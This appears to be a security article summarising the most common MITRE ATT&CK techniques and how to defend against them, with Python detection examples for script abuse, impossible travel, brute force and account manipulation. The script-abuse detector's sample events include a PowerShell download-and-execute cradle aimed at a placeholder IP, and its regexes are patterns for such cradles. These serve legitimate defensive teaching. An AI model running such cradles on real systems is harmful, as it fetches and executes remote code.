Thursday, November 7, 2024

Top MITRE ATT&CK Techniques and How to Defend Against Them

Of the hundreds of documented MITRE ATT&CK techniques, two dominate the field: command and scripting interpreters (T1059) and phishing (T1566).

In a report published on April 10, D3 Security analyzed more than 75,000 recent cybersecurity incidents. Its goal was to determine which methods of attack were most common.

The results paint a stark picture: these two techniques outpaced all others by orders of magnitude, with the top technique outpacing the runner-up by a factor of three.

For defenders looking to allocate limited attention and resources, here are just some of the most common ATT&CK techniques, and how to defend against them.

Execution: Command and Scripting Interpreter (Used in 52.22% of Attacks)

What it is: Attackers write scripts in popular languages like PowerShell and Python for two primary purposes. Most commonly, they’re used to automate malicious tasks such as harvesting data or downloading and extracting a payload. They’re also useful for evading detection — bypassing antivirus solutions, extended detection and response (XDR), and the like.

That these scripts are far and away No. 1 on this list is extra surprising to Adrianna Chen, D3’s vice president of product and service. “Since Command and Scripting Interpreter (T1059) falls under the Execution tactic, it’s in the middle stage of the MITRE ATT&CK kill chain,” she says. “So, it’s fair to assume that other techniques from earlier tactics have already gone undetected by the time that it is detected by the EDR tool. Given that this one technique was so prominent in our data set, it underscores the importance of having processes to trace back to the origin of an incident.”

How to defend against it: Because malicious scripts are diverse and multifaceted, dealing with them requires a thorough incident response plan that combines detection of potentially malicious behaviors with strict watch over privileges and script execution policies.
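The "detection of potentially malicious behaviors" part of that plan is usually a triage rule over process-creation telemetry. The following is an added example, not code from the article or from D3: it scores each event on well-known interpreter abuse indicators (encoded commands, hidden windows, download cradles, scripts launched from temp directories) and on the parent process, so that an Office or mail client spawning PowerShell stands out and the analyst has the parent context needed to trace the incident back to its origin. The sample events, the regexes, the weights and the threshold are all assumptions constructed for this example.

```python
import re

# Constructed process-creation events for illustration (not data from the D3 report).
# Each record is what an EDR or Sysmon-style log would carry: user, parent, command line.
SAMPLE_EVENTS = [
    {"user": "alice", "parent": "explorer.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"user": "bob", "parent": "WINWORD.EXE",   # placeholder base64 blob, not a real payload
     "cmd": "powershell.exe -nop -w hidden -ep bypass -enc UExBQ0VIT0xERVI="},
    {"user": "svc-build", "parent": "jenkins.exe",
     "cmd": "python.exe build.py --target release"},
    {"user": "carol", "parent": "cmd.exe",
     "cmd": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"user": "dave", "parent": "outlook.exe",
     "cmd": r"wscript.exe C:\Users\dave\AppData\Local\Temp\invoice.vbs"},
]

# Command-line indicators: (name, compiled regex, weight). Weights are assumptions
# chosen for this example, not a published scoring scheme.
CMD_INDICATORS = [
    ("encoded_command", re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 1),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 2),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("script_in_temp_dir", re.compile(r"\\(Temp|Downloads)\\\S+\.(ps1|vbs|js|bat)", re.I), 2),
]
# Office and mail clients rarely have a legitimate reason to spawn an interpreter;
# the parent process is also the thread an analyst pulls to find the initial access.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
OFFICE_PARENT_WEIGHT = 3


def score_event(event):
    """Return (score, [indicator names]) for one process-creation event."""
    score, hits = 0, []
    for name, pattern, weight in CMD_INDICATORS:
        if pattern.search(event["cmd"]):
            score += weight
            hits.append(name)
    if event["parent"].lower() in OFFICE_PARENTS:
        score += OFFICE_PARENT_WEIGHT
        hits.append("office_parent")
    return score, hits


def triage(events, threshold=3):
    """Return the events worth an analyst's attention, with the reasons they were flagged."""
    flagged = []
    for event in events:
        score, hits = score_event(event)
        if score >= threshold:
            flagged.append({"user": event["user"], "parent": event["parent"],
                            "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['user']:<10} parent={finding['parent']:<13} "
              f"score={finding['score']} {finding['indicators']}")
```

On the constructed sample, the scheduled backup script and the build-server job score zero while the three suspicious launches are flagged; in production the same scoring would feed the "strict watch over privileges and script execution policies" by telling you which users and parent processes are running interpreters at all.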

Initial Access: Phishing (15.44%)

What it is: Phishing and its subcategory, spear-phishing (T1566.001-004), are the first and third most common ways attackers gain access to targeted systems and networks. Using the first in general campaigns and the second when aiming for specific individuals or organizations, the goal is to coerce victims into divulging critical information that will allow a foothold into sensitive accounts and devices.

How to defend against it: Even the smartest and most educated among us fall for sophisticated social engineering. Frequent education and awareness campaigns can go some way toward protecting employees from themselves and the companies they provide a window into.

Initial Access: Valid Accounts (3.47%)

What it is: Often, successful phishing allows attackers access to legitimate accounts. These accounts provide keys to otherwise locked doors, and cover for their various misdeeds.

How to defend against it: When employees inevitably click on that malicious PDF or URL, robust multifactor authentication (MFA) can, if nothing else, act as more hoops for attackers to jump through. Anomaly detection tools can also help if, for example, a strange user connects from a faraway IP address, or simply does something they aren’t expected to do.
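The "faraway IP address" check is the classic impossible-travel rule: two sign-ins by the same account whose distance and time gap imply a speed no traveller could reach. The following is an added example, not code from the article or D3's product: it orders sign-in events per user, computes the great-circle distance between consecutive sessions, and also flags a country the user has never signed in from and any session that skipped MFA. The sign-in records, the per-user baseline, the 900 km/h speed ceiling and the 100 km minimum distance are assumptions constructed for the example.

```python
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sign-in events (not from the report). lat/lon is the city-level
# geolocation an identity provider typically attaches to the source IP.
LOGINS = [
    {"user": "alice", "ts": "2024-11-07T08:00:00Z", "ip": "198.51.100.10",
     "lat": 40.71, "lon": -74.01, "country": "US", "mfa": True},
    {"user": "alice", "ts": "2024-11-07T09:30:00Z", "ip": "203.0.113.77",
     "lat": 55.75, "lon": 37.62, "country": "RU", "mfa": False},
    {"user": "bob", "ts": "2024-11-07T08:15:00Z", "ip": "198.51.100.22",
     "lat": 51.51, "lon": -0.13, "country": "GB", "mfa": True},
    {"user": "bob", "ts": "2024-11-07T17:45:00Z", "ip": "198.51.100.23",
     "lat": 48.86, "lon": 2.35, "country": "FR", "mfa": True},
]
# Countries each user has signed in from historically (assumed baseline).
BASELINE_COUNTRIES = {"alice": {"US"}, "bob": {"GB", "FR"}}


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points, in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detect(logins, baseline, max_speed_kmh=900.0, min_distance_km=100.0):
    """Return one alert per sign-in that looks like someone else using a valid account."""
    alerts = []
    last_seen = {}  # user -> previous sign-in record
    for login in sorted(logins, key=lambda rec: (rec["user"], parse_ts(rec["ts"]))):
        reasons = []
        prev = last_seen.get(login["user"])
        if prev is not None:
            km = haversine_km(prev["lat"], prev["lon"], login["lat"], login["lon"])
            hours = (parse_ts(login["ts"]) - parse_ts(prev["ts"])).total_seconds() / 3600
            # Two sessions far apart in space but close in time cannot both be the real user.
            if km > min_distance_km and (hours <= 0 or km / hours > max_speed_kmh):
                reasons.append("impossible_travel")
        if login["country"] not in baseline.get(login["user"], set()):
            reasons.append("new_country")
        if not login["mfa"]:
            reasons.append("no_mfa")
        if reasons:
            alerts.append({"user": login["user"], "ip": login["ip"],
                           "ts": login["ts"], "reasons": reasons})
        last_seen[login["user"]] = login
    return alerts


if __name__ == "__main__":
    for alert in detect(LOGINS, BASELINE_COUNTRIES):
        print(alert)
```

Bob's London-to-Paris day (about 340 km in nine and a half hours) passes quietly; Alice's second session, roughly 7,500 km away 90 minutes after the first, from a country she has never used and without MFA, is the single alert. In practice the rule should also tolerate known VPN egress points, which otherwise look like teleportation.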

Credential Access: Brute Force (2.05%)

What it is: A more popular option back in the olden days, brute force attacks have stuck around thanks to the ubiquity of weak, reused, and unchanged passwords. Here, attackers use scripts that automatically run through username and password combinations — like in a dictionary attack — to gain access to desired accounts.

How to defend against it: No item on this list is as easily and wholly preventable as brute-force attacks. Using strong enough passwords fixes the problem on its own, full stop. Other little mechanisms, like locking out a user after repeated login attempts, also do the trick.
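The lockout mechanism the author mentions is simple to get right if failures are counted in a sliding window rather than forever. The following is an added example, not code from the article or D3: a small tracker that locks an account after too many failures inside a time window, and, because a per-account lockout does nothing against a source that tries one guess against many accounts, also reports sources that fail against many distinct accounts in the same window. The thresholds and the sample sequence of attempts are assumptions constructed for this example; timestamps are passed in as plain seconds so the logic is testable.

```python
from collections import defaultdict, deque


class LoginGuard:
    """Sliding-window failed-login tracker with per-account lockout.

    Thresholds are assumptions for this example; tune them per environment.
    Times are seconds (e.g. time.time()) supplied by the caller.
    """

    def __init__(self, max_failures=5, window_s=300, lockout_s=900, spray_threshold=10):
        self.max_failures = max_failures
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.spray_threshold = spray_threshold
        self.failures = defaultdict(deque)     # account -> timestamps of recent failures
        self.locked_until = {}                 # account -> time the lockout expires
        self.source_users = defaultdict(dict)  # source IP -> {account: last failure time}

    def _prune(self, timestamps, now):
        # Drop failures that fell out of the window so old mistakes don't accumulate.
        while timestamps and now - timestamps[0] > self.window_s:
            timestamps.popleft()

    def is_locked(self, account, now):
        return self.locked_until.get(account, 0) > now

    def record_failure(self, account, source_ip, now):
        """Record a failed attempt; return True if this attempt triggered a lockout."""
        self.source_users[source_ip][account] = now
        recent = self.failures[account]
        recent.append(now)
        self._prune(recent, now)
        if len(recent) >= self.max_failures:
            self.locked_until[account] = now + self.lockout_s
            recent.clear()
            return True
        return False

    def record_success(self, account):
        """A genuine login clears the counter (callers must check is_locked first)."""
        self.failures[account].clear()

    def spraying_sources(self, now):
        """Sources that failed against many different accounts within the window."""
        return [src for src, accounts in self.source_users.items()
                if sum(1 for t in accounts.values() if now - t <= self.window_s)
                >= self.spray_threshold]


if __name__ == "__main__":
    guard = LoginGuard(max_failures=3, window_s=60, lockout_s=300, spray_threshold=4)
    for t in (0, 10, 20):
        print("lockout" if guard.record_failure("alice", "10.0.0.5", t) else "failure", t)
    print("alice locked at t=100:", guard.is_locked("alice", 100))
    for i in range(4):
        guard.record_failure(f"user{i}", "203.0.113.9", 200)
    print("spraying sources:", guard.spraying_sources(200))
```

Two design points worth keeping: the lockout is keyed on the account and the spray check on the source, because an attacker who rotates accounts defeats the first and one who rotates IPs defeats the second, and a lockout that never expires is itself a denial-of-service lever against legitimate users, so `lockout_s` is finite.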

Persistence: Account Manipulation (1.34%)

What it is: Once an attacker has used phishing, brute force, or any other means to access a privileged account, they can then leverage that account to cement their position in a targeted system. For example, they can change the account’s credentials to lock out its original owner, or possibly adjust permissions in order to access even more privileged resources than they already have.

How to defend against it: To mitigate the damage from an account compromise, D3 recommends organizations implement stringent restrictions for accessing sensitive resources, and follow the principle of least privileged access: granting no more than the minimum level of access necessary for any user to perform his or her job.

Besides that, it offers a number of recommendations that can apply to this and other MITRE techniques, including:

  • Maintaining vigilance through continuous monitoring of logs to detect and respond to any suspicious account activities

  • Operating under the assumption that the network has already been compromised and adopting proactive measures to mitigate potential damage

  • Streamlining response efforts by automating countermeasures upon detection of confirmed security breaches, ensuring swift and effective mitigation
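Least-privilege access and continuous log monitoring meet in the identity audit trail: every credential change and role grant is an event that can be checked against who is allowed to hold what. The following is an added example, not code from the article or D3: it runs constructed audit events through three rules that correspond to the manipulations described above (someone other than the owner or the help desk changing an account's credentials, MFA being removed, and a role grant that exceeds the target's least-privilege allowlist or that a user gives to themselves). The events, job functions, role allowlist and which job functions may reset others' credentials are all assumptions made for this example.

```python
# Constructed identity audit events (not data from the D3 report).
AUDIT_EVENTS = [
    {"id": 1, "actor": "alice",   "action": "password_change", "target": "alice"},
    {"id": 2, "actor": "mallory", "action": "password_change", "target": "alice"},
    {"id": 3, "actor": "mallory", "action": "mfa_remove",      "target": "alice"},
    {"id": 4, "actor": "mallory", "action": "role_grant",      "target": "mallory", "role": "global-admin"},
    {"id": 5, "actor": "bob",     "action": "password_change", "target": "carol"},
    {"id": 6, "actor": "alice",   "action": "role_grant",      "target": "alice",   "role": "deployer"},
]

# Assumed job functions and the least-privilege allowlist of roles each may hold.
JOB_FUNCTION = {"alice": "engineer", "bob": "helpdesk", "mallory": "engineer", "carol": "engineer"}
ROLE_ALLOWLIST = {
    "helpdesk": {"reader", "password-reset"},
    "engineer": {"reader", "deployer"},
    "admin":    {"reader", "deployer", "global-admin"},
}
PRIVILEGED_ROLES = {"global-admin"}
CREDENTIAL_ACTIONS = {"password_change", "mfa_remove", "recovery_email_change"}
# Job functions permitted to change someone else's credentials (assumed).
CREDENTIAL_ADMINS = {"helpdesk", "admin"}


def audit_alerts(events):
    """Return the audit events that violate the account-manipulation rules, with reasons."""
    alerts = []
    for ev in events:
        reasons = []
        actor_job = JOB_FUNCTION.get(ev["actor"])
        target_job = JOB_FUNCTION.get(ev["target"])
        is_self = ev["actor"] == ev["target"]

        # Rule 1: only the owner or an authorised function may change an account's credentials.
        if ev["action"] in CREDENTIAL_ACTIONS and not is_self and actor_job not in CREDENTIAL_ADMINS:
            reasons.append("unauthorized_credential_change")
        # Rule 2: removing MFA weakens the control that limits a stolen password, so always review it.
        if ev["action"] == "mfa_remove":
            reasons.append("mfa_removed")
        # Rule 3: a role outside the target's allowlist breaks least privilege; a user granting
        # a privileged role to themselves is the "adjust permissions" step described above.
        if ev["action"] == "role_grant":
            if ev["role"] not in ROLE_ALLOWLIST.get(target_job, set()):
                reasons.append("exceeds_least_privilege")
            if ev["role"] in PRIVILEGED_ROLES and is_self:
                reasons.append("self_privilege_grant")

        if reasons:
            alerts.append({"id": ev["id"], "actor": ev["actor"],
                           "target": ev["target"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in audit_alerts(AUDIT_EVENTS):
        print(alert)
```

Events 1, 5 and 6 are the legitimate baseline (a self-service password change, a help-desk reset, an engineer taking a role the allowlist permits); events 2 through 4 are the lockout-the-owner and escalate-permissions pattern. Because the rules are expressed against an explicit allowlist, the same table that produces the alerts is also the artefact a least-privilege review audits.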
